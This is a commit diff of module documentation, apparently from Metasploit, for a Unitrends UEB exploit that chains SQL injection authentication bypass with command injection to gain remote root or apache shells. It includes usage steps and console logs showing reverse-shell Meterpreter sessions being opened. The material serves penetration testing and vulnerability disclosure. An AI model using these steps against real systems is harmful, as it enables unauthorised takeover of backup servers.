finish up docs and 10 exploit
This commit is contained in:
h00die
@@ -0,0 +1,93 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This exploit leverages a sqli vulnerability for authentication bypass,
|
||||
together with command injection for subsequent RCE.
|
||||
|
||||
This exploit has two targets:
|
||||
|
||||
1. Unitrends UEB 9 http api/storage RCE for root privileges
|
||||
2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. ```use exploit/linux/http/ueb_api_rce```
|
||||
2. ```set lhost [IP]```
|
||||
3. ```set rhost [IP]```
|
||||
4. ```set target [#]```
|
||||
5. ```exploit```
|
||||
6. A meterpreter session should have been opened successfully
|
||||
|
||||
## Scenarios
|
||||
|
||||
### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/ueb_api_rce
|
||||
msf5 exploit(linux/http/ueb_api_rce) > set target 0
|
||||
target => 0
|
||||
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
|
||||
rhost => 1.1.1.1
|
||||
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
|
||||
lhost => 2.2.2.2
|
||||
msf5 exploit(linux/http/ueb_api_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 2.2.2.2:4444
|
||||
[*] 1.1.1.1:443 - Sending requests to UEB...
|
||||
[*] Command Stager progress - 19.76% done (164/830 bytes)
|
||||
[*] Command Stager progress - 39.16% done (325/830 bytes)
|
||||
[*] Command Stager progress - 56.87% done (472/830 bytes)
|
||||
[*] Command Stager progress - 74.82% done (621/830 bytes)
|
||||
[*] Command Stager progress - 92.77% done (770/830 bytes)
|
||||
[*] Command Stager progress - 110.48% done (917/830 bytes)
|
||||
[*] Sending stage (861480 bytes) to 1.1.1.1
|
||||
[*] Command Stager progress - 126.63% done (1051/830 bytes)
|
||||
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 1.1.1.1
|
||||
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
```
|
||||
|
||||
### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/ueb_api_rce
|
||||
msf5 exploit(linux/http/ueb_api_rce) > set target 1
|
||||
target => 1
|
||||
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
|
||||
rhost => 1.1.1.1
|
||||
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
|
||||
lhost => 2.2.2.2
|
||||
msf5 exploit(linux/http/ueb_api_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 2.2.2.2:4444
|
||||
[*] 1.1.1.1:443 - Sending requests to UEB...
|
||||
[*] Command Stager progress - 19.76% done (164/830 bytes)
|
||||
[*] Command Stager progress - 39.16% done (325/830 bytes)
|
||||
[*] Command Stager progress - 56.87% done (472/830 bytes)
|
||||
[*] Command Stager progress - 74.82% done (621/830 bytes)
|
||||
[*] Command Stager progress - 92.77% done (770/830 bytes)
|
||||
[*] Command Stager progress - 110.48% done (917/830 bytes)
|
||||
[*] Sending stage (861480 bytes) to 1.1.1.1
|
||||
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
|
||||
[*] Command Stager progress - 126.63% done (1051/830 bytes)
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 1.1.1.1
|
||||
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > getuid
|
||||
Server username: uid=48, gid=48, euid=48, egid=48
|
||||
meterpreter > shell
|
||||
Process 25534 created.
|
||||
Channel 1 created.
|
||||
whoami
|
||||
apache
|
||||
```
|
||||
@@ -1,42 +0,0 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Unitrends UEB 9 http api/storage remote root
|
||||
|
||||
This exploit leverages a sqli vulnerability for authentication bypass,
|
||||
together with command injection for subsequent root RCE.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. ```use exploit/linux/http/ueb9_api_storage ```
|
||||
2. ```set lhost [IP]```
|
||||
3. ```set rhost [IP]```
|
||||
4. ```exploit```
|
||||
5. A meterpreter session should have been opened successfully
|
||||
|
||||
## Scenarios
|
||||
|
||||
### UEB 9.1 on CentOS 6.5
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/ueb9_api_storage
|
||||
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
|
||||
rhost => 10.0.0.230
|
||||
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
|
||||
lhost => 10.0.0.141
|
||||
msf exploit(ueb9_api_storage) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||||
[*] 10.0.0.230:443 - pwn'ng ueb 9....
|
||||
[*] Command Stager progress - 19.83% done (164/827 bytes)
|
||||
[*] Command Stager progress - 39.30% done (325/827 bytes)
|
||||
[*] Command Stager progress - 57.44% done (475/827 bytes)
|
||||
[*] Command Stager progress - 75.45% done (624/827 bytes)
|
||||
[*] Command Stager progress - 93.35% done (772/827 bytes)
|
||||
[*] Command Stager progress - 110.88% done (917/827 bytes)
|
||||
[*] Sending stage (826872 bytes) to 10.0.0.230
|
||||
[*] Command Stager progress - 126.72% done (1048/827 bytes)
|
||||
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
```
|
||||
Reference in New Issue
Block a user